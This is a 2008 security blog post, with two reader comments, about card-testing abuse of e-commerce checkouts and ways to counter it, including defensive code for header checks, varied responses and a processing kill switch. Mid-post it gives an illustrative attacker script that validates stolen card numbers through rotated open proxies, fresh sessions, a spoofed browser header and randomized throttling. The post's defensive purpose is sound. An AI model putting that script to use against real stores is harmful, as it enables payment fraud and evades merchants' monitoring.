Preventing BlackHat Automation
Tuesday, April 8, 2008

Yesterday on PhishMe, I talked about my trip to Chicago to visit my good friend Sachin. While out there, we hung out with his buddy John, who works for a small web design firm. John's firm sells quite a few e-commerce sites, and he had an interesting tale of a DoS attack against one of their client sites.
Except DoS wasn't the intended purpose of the attack. The attackers were actually abusing the web application to scrub a list of credit card numbers and figure out which ones were good. The DoS occurred when Authorize.NET stopped accepting transactions from the site, preventing legit customers from making purchases.
Their immediate solution was to block the offending IP, which stopped the attack. But the vulnerability still existed in the application, so they put in further validation; we didn't really get into the details.
I made the argument that no matter what kind of validation you put in place, you still need to let anonymous users place orders with credit cards. Additionally, you can't effectively block malicious users from placing an infinite number of orders because:
1. Malicious users can route their requests through open proxies, rendering IP filtering ineffective.
2. Malicious users can utilize multiple identities and credit card numbers, so you can't just block John Q. Hacker.
3. Limits on sessions won't help, since attackers can just get new session tokens.
John pretty much agreed, and added that they've since become more vigilant and more actively monitor usage of their sites. Unfortunately, this monitoring is all done manually, which doesn't make for a scalable solution.
Monitoring, whether manual or automated, is also only effective against stupid attackers who don't throttle their requests and don't make an effort to make them look legit. A savvy attacker can randomize the time between his automated requests and rotate through a large number of open proxies to hide his true intentions. If he does some homework and determines how many legitimate orders a given web site handles per day, he can throttle his requests such that no red flags are raised. The sketch below shows how little effort that takes.
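To make that concrete, here's a minimal sketch of what such an attacker's script might look like. Everything in it is invented for illustration: the proxy list, the store URL, the form field names, and the assumed daily order volume (the card numbers are well-known test numbers).

```python
import random
import time

import requests

# Invented inputs: proxies, URL, and form fields are all hypothetical.
OPEN_PROXIES = ["http://203.0.113.10:8080", "http://198.51.100.7:3128"]
CHECKOUT_URL = "https://victim-store.example.com/checkout"
CARDS_TO_SCRUB = ["4111111111111111", "4012888888881881"]

# Suppose recon says the store sees roughly 200 legitimate orders a day;
# the attacker paces himself to stay well inside that volume.
AVG_GAP = 86400 / 200

for card in CARDS_TO_SCRUB:
    session = requests.Session()             # fresh session token each time
    proxy = random.choice(OPEN_PROXIES)      # different source IP each time
    resp = session.post(
        CHECKOUT_URL,
        data={"cc_number": card, "cc_exp": "04/10", "amount": "1.00"},
        proxies={"http": proxy, "https": proxy},
        headers={"User-Agent": "Mozilla/5.0"},  # look like a browser
    )
    print(card, "good" if "order was successful" in resp.text else "bad")
    # Randomize the gap so the traffic has no machine-regular rhythm.
    time.sleep(AVG_GAP * random.uniform(0.5, 1.5))
```

Nothing in that loop looks any different from a slow trickle of real customers, which is exactly the problem.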
Below is a list of possible countermeasures that could be deployed to prevent such abuse and automation.
1. Make the attacker, but not browser-based users, jump through hoops. Enforce strict HTTP request validation on critical transactional URLs, and make sure every header a normal browser would send is present in the request (see the first sketch after this list).
2. Reverse CAPTCHA. Build a response that a human can understand, but would be difficult for an automated bot to interpret. Show a picture of some dogs, and display a message to the effect of: "If you see 3 golden retrievers in this picture, your order was successful."
3. Use alternate communication channels for response data. An easy one would be to SMS the transaction result to a mobile number. Of course, you can't rely on all users being able to receive SMS...
4. Use a combination of numbers two and three, and make your process dynamic.
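To give a feel for countermeasure number one, here's a minimal sketch using Flask. The transactional paths and the header list are assumptions you'd tune against your own real traffic before enforcing anything.

```python
from flask import Flask, abort, request

app = Flask(__name__)

# Illustrative values: adjust both lists to match your own site and traffic.
CRITICAL_PATHS = ("/checkout", "/order/submit")
EXPECTED_HEADERS = ("User-Agent", "Accept", "Accept-Language", "Referer")

@app.before_request
def require_browser_headers():
    """Reject requests to transactional URLs missing normal browser headers."""
    if request.path in CRITICAL_PATHS:
        for header in EXPECTED_HEADERS:
            if not request.headers.get(header):
                abort(400)  # quick-and-dirty scripts rarely send all of these
```

A determined attacker can forge every one of these headers, of course; the point is only to weed out lazy automation cheaply, as one hoop among several.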
There are two themes to these countermeasures:
1. Make your process complicated to automate.
2. Make your responses hard to interpret programmatically.
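As a toy illustration of the second theme, a site could rotate its response phrasing so there's no fixed success string for a bot to grep for. The templates here are invented, and this is just one possible shape of the idea:

```python
import random

# Any human reads these instantly, but a bot grepping the response
# for a single fixed success string comes up empty.
SUCCESS = [
    "Great news! Your order #%s is on its way.",
    "Order %s went through. Watch your inbox for a receipt.",
    "All set. We'll start packing order %s right away.",
]
FAILURE = [
    "Hmm, something didn't add up with order %s. Give us a call.",
    "We couldn't finish order %s just yet. Please check your details.",
]

def render_result(order_id, success):
    # Pick a different phrasing (and ideally a different layout) each time.
    return random.choice(SUCCESS if success else FAILURE) % order_id
```

On its own this only raises the bar a little, since a patient attacker can collect samples and classify them; pairing it with image-based responses like the reverse CAPTCHA above makes that classification job much harder.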
And one last idea: if you're content with monitoring for the time being, you still need to be able to react when you see someone doing something naughty. In the case of credit card validation abuse, an easy countermeasure is the ability to quickly disable real-time processing. Your site will still accept orders, but they won't be processed until after human review. A sketch of that kill switch follows.
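Here's a minimal sketch of what that might look like; the settings file, the gateway object, and the review queue are all assumptions for illustration.

```python
import json

SETTINGS_FILE = "settings.json"  # hypothetical, e.g. {"realtime_processing": true}

def process_order(order, gateway, review_queue):
    """Charge immediately in normal operation; queue for review during abuse."""
    with open(SETTINGS_FILE) as f:
        realtime = json.load(f).get("realtime_processing", True)
    if realtime:
        return gateway.charge(order)   # hypothetical payment gateway call
    review_queue.append(order)         # hold the order for a human to review
    return "accepted"                  # the customer still sees a normal page
```

An operator who spots abuse flips one flag, the card scrubbing stops yielding answers, and legitimate orders keep flowing in the meantime.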
2 comments:
This is exactly what CAPTCHAs are designed for. To prove that a human is on the other side of the transaction. There's no need to bother with fancy 'reverse captchas' which will only confuse your users. Just require a CAPTCHA to be satisfied as a part of the same form where the credit card is entered. As to the effectiveness of CAPTCHAs, well, they're a lot better than nothing.
rezn
Very true. I was trying to think of ways to make CAPTCHAs harder to crack, but easier for people to use. Something along the lines of http://research.microsoft.com/asirra/
and http://www.rorsecurity.info/2008/04/04/webappsec-the-idea-of-negative-captchas/.
If you don't make the user jump through hoops (deciphering an unreadable CAPTCHA) but instead require human evaluation to interpret the results of the transaction you're trying to protect, you achieve the same results.
Is it easier than a regular CAPTCHA? Perhaps not.